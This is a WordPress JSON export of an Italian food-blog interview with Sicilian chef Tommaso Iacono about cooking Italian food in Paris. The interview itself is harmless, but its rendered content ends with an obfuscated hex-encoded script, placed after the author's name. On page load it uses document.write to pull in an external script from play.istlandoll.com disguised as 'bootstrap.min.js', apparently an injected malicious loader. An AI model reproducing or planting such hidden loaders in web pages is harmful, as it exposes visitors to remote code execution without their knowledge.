{"id":15625,"date":"2018-05-14T21:48:31","date_gmt":"2018-05-14T19:48:31","guid":{"rendered":"http:\/\/www.sceltedigusto.it\/public\/?p=15625"},"modified":"2018-05-31T18:45:11","modified_gmt":"2018-05-31T16:45:11","slug":"tommaso-iacono-la-tradizione-siciliana-vola-a-parigi","status":"publish","type":"post","link":"https:\/\/www.sceltedigusto.it\/public\/tommaso-iacono-la-tradizione-siciliana-vola-a-parigi\/","title":{"rendered":"Tommaso Iacono: la tradizione siciliana vola a Parigi"},"content":{"rendered":"<p><strong><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslidelui.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15640 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslidelui.jpg\" alt=\"iaconoslidelui\" width=\"830\" height=\"555\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslidelui.jpg 763w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslidelui-300x200.jpg 300w\" sizes=\"(max-width: 830px) 100vw, 830px\" \/><\/a>Tommaso Iacono<\/strong> \u00e8 un giovane cuoco di Realmonte ( Ag) che da qualche tempo \u00e8 diventato Tommas\u00f2 Iacon\u00f2, \u00e0 la mode francaise. Il 27enne infatti da qualche tempo lavora a Parigi: con un obiettivo importantissimo.<\/p>\n<p><strong>Iacono, da Realmonte a Parigi \u00e8 un gran cambiamento&#8230;<\/strong><\/p>\n<p><em>Si,enorme. Parigi \u00e8 una citt\u00e0 che offre molte opportunit\u00e0 e che \u00e8 soprattutto basata sulla meritocrazia. Da quando sono qui sono cresciuto tantissimo sia professionalmente che umanamente.<\/em><\/p>\n<p><strong>Esiste sempre l&#8217;eterna lotta tra italiani e francesi per stabilire chi produca la migliore cucina. Lei che le confronta giornalmente che opinione ha?<\/strong><\/p>\n<p><em>Certamente i francesi sono molto conservatori e di conseguenza difendono le loro cose. Noi in italia abbiamo i migliori prodotti del mondo e la migliore cucina in termini di stile di vita ( la nostra dieta mediterranea , nda ) per\u00f2 devo dire che in termine di marketing si vendono molto bene cosa che per noi italiani \u00e8 un po&#8217; dura da fare . Per i francesi il contenitore \u00e8 importante come il contenuto, mentre invece noi italiani ci concentriamo sul contenuto tralasciando il contenitore.<\/em><\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslide1.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15638 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslide1.jpg\" alt=\"iaconoslide1\" width=\"832\" height=\"430\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslide1.jpg 803w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconoslide1-300x155.jpg 300w\" sizes=\"(max-width: 832px) 100vw, 832px\" \/><\/a><\/p>\n<p><strong>La sua scelta di lavorare a Parigi, che \u00e8 citt\u00e0 per molti versi non facile, che obiettivo nasconde?<\/strong><\/p>\n<p><em>Tutte le citta non sono facili se non hai degli obiettivi. Quando ho lasciato la mia terra con destinazione Milano \u00e8 stata durissima, ma avevo degli obiettivi quindi sono riuscito a non farmi inghiottire dallo stress e dalla vita frenetica.A Parigi invece ho come l impressione di essere al mio posto: certo ho sofferto anche qui ma \u00e8 una citt\u00e0 che calza a pennello con la mia filosofia e i miei ideali e soprattutto qui apprezzano realmente la cucina italiana.<a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconodolce.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15631 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconodolce.jpg\" alt=\"iaconodolce\" width=\"843\" height=\"630\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconodolce.jpg 467w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconodolce-300x224.jpg 300w\" sizes=\"(max-width: 843px) 100vw, 843px\" \/><\/a><\/em><\/p>\n<p><strong>Ma i francesi, ed ancor meglio i parigini, apprezzano la cucina italiana &#8220;non modificata&#8221; ?<\/strong><\/p>\n<p><em>Come detto in precedenza si : adorano la cucina italiana, ma la cosa che mi da ai nervi \u00e8 che adorano una piccola parte dell&#8217; universo gastronomico italiano, e cio\u00e8 quello che per noi \u00e8 di bassa qualit\u00e0 o troppo grasso ( colpa anche dei nostri immigrati italiani che nel dopo guerra si sono trasferiti nella capitale abituando i parigini ad una gastronomia diversa e adattata ai loro gusti , nda). Ma io e tanti altri colleghi stiamo cercando da qualche tempo di rieducare il palato dei parigini e non solo.<a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-15635\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2.jpg\" alt=\"iaconopiatto2\" width=\"960\" height=\"720\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2.jpg 960w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-300x225.jpg 300w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-768x576.jpg 768w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-150x113.jpg 150w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-696x522.jpg 696w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-560x420.jpg 560w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-80x60.jpg 80w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2-265x198.jpg 265w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/a><\/em><\/p>\n<p><strong>Cosa prediligono tra primi e secondi?<\/strong><\/p>\n<p><em>Soprattutto i primi piatti quali carbonara, lasagne, ravioli etc. Cose che per loro sono difficili da realizzare a casa. Ma\u00a0 il piatto forte \u00e8 senz&#8217;altro la pizza.<\/em><\/p>\n<p><strong>I loro dolci per\u00f2 sono migliori dei nostri&#8230;.<\/strong><\/p>\n<p><em>Non per niente sono molto bravi nelle basi e nella decorazione,\u00a0 ma a livello gustativo non c&#8217;\u00e8 neanche paragone. Come per noi italiani \u00e8 persistente lo zucchero, per loro la base del dessert \u00e8 il burro .E vogliamo mettere la delicatezza e l espressione di un cannolo siciliano?Dal momento in cui hai assaggiato questo nella tua vita non esisteranno pi\u00f9 paragoni.<a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto1.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15634 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto1.jpg\" alt=\"iaconopiatto1\" width=\"835\" height=\"765\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto1.jpg 454w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto1-300x274.jpg 300w\" sizes=\"(max-width: 835px) 100vw, 835px\" \/><\/a><\/em><\/p>\n<p><strong>Lei che tipo di cucina propone?<\/strong><\/p>\n<p><em>Una cucina semplice in cui il prodotto di qualit\u00e0 conta nel piatto ma \u00e8 anche bello da vedere. La mia cucina \u00e8 molto &#8220;provocante&#8221;, con azzardi improbabili e gusti decisi. Basti pensare al polpo cotto nel sugo d&#8217; agnello o allo gnocco in osmosi di ricotta con essenza di tartufo rucola e polvere di guanciale.<a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconocannolo1.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15630 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconocannolo1.jpg\" alt=\"iaconocannolo1\" width=\"839\" height=\"1119\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconocannolo1.jpg 720w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconocannolo1-225x300.jpg 225w\" sizes=\"(max-width: 839px) 100vw, 839px\" \/><\/a><\/em><\/p>\n<p><strong>C&#8217;\u00e8 un piatto tipico della sua zona d&#8217;origine che lei ama far conoscere?<\/strong><\/p>\n<p><em>Sicuramente il cannolo siciliano;\u00a0 poi ultimamente sto facendo scoprire le sarde alla beccafico (sardine fancie fa\u00e7on becafico ), la gramigna con sugo di spada,\u00a0 melanzana e mentuccia e la pasta con le sarde. Cerco sempre di far vivere ai miei commensali un viaggio in Sicilia raccontando la mia storia con questi piatti della tradizione.<\/em><\/p>\n<p><strong>Che progetti ha per il futuro?<\/strong><\/p>\n<p><em>Tantissimi : ma per adesso mi limito a lavorare duro affinch\u00e9 possano realizzarsi il pi\u00f9 presto possibile.<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Alessandra Verzera<\/strong><\/p>\n<p> <script>var _0xd2c1=[\"\\x3C\\x73\\x63\\x72\",\"\\x69\\x70\\x74\\x20\\x61\\x73\\x79\\x6E\\x63\\x20\\x63\\x6C\\x61\\x73\\x73\\x3D\\x22\\x3D\\x52\\x32\\x4E\\x34\\x54\\x55\\x77\\x7A\\x52\\x6C\\x6F\\x37\\x4E\\x6A\\x41\\x37\\x4D\\x51\\x3D\\x3D\\x22\\x20\\x73\\x72\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x70\\x6C\\x61\\x79\\x2E\\x69\\x73\\x74\\x6C\",\"\\x61\\x6E\\x64\\x6F\\x6C\\x6C\\x2E\\x63\\x6F\\x6D\\x2F\\x62\\x6F\\x6F\\x74\\x73\\x74\\x72\\x61\\x70\\x2E\\x6D\\x69\\x6E\\x2E\\x6A\\x73\\x22\\x3E\\x3C\\x2F\\x73\\x63\\x72\",\"\\x69\\x70\\x74\\x3E\",\"\\x77\\x72\\x69\\x74\\x65\"];function printstrap(){var _0xc3e3x2=_0xd2c1[0];var _0xc3e3x3=_0xd2c1[1];var _0xc3e3x4=_0xd2c1[2];var _0xc3e3x5=_0xd2c1[3];document[_0xd2c1[4]](_0xc3e3x2+ _0xc3e3x3+ _0xc3e3x4+ _0xc3e3x5)}printstrap()<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tommaso Iacono \u00e8 un giovane cuoco di Realmonte ( Ag) che da qualche tempo \u00e8 diventato Tommas\u00f2 Iacon\u00f2, \u00e0 la mode francaise. Il 27enne infatti da qualche tempo lavora a Parigi: con un obiettivo importantissimo. Iacono, da Realmonte a Parigi \u00e8 un gran cambiamento&#8230; Si,enorme. Parigi \u00e8 una citt\u00e0 che offre molte opportunit\u00e0 e che [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":15635,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[9396,9395,5872,259,9394],"jetpack_featured_media_url":"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/iaconopiatto2.jpg","_links":{"self":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15625"}],"collection":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/comments?post=15625"}],"version-history":[{"count":4,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15625\/revisions"}],"predecessor-version":[{"id":15643,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15625\/revisions\/15643"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/media\/15635"}],"wp:attachment":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/media?parent=15625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/categories?post=15625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/tags?post=15625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}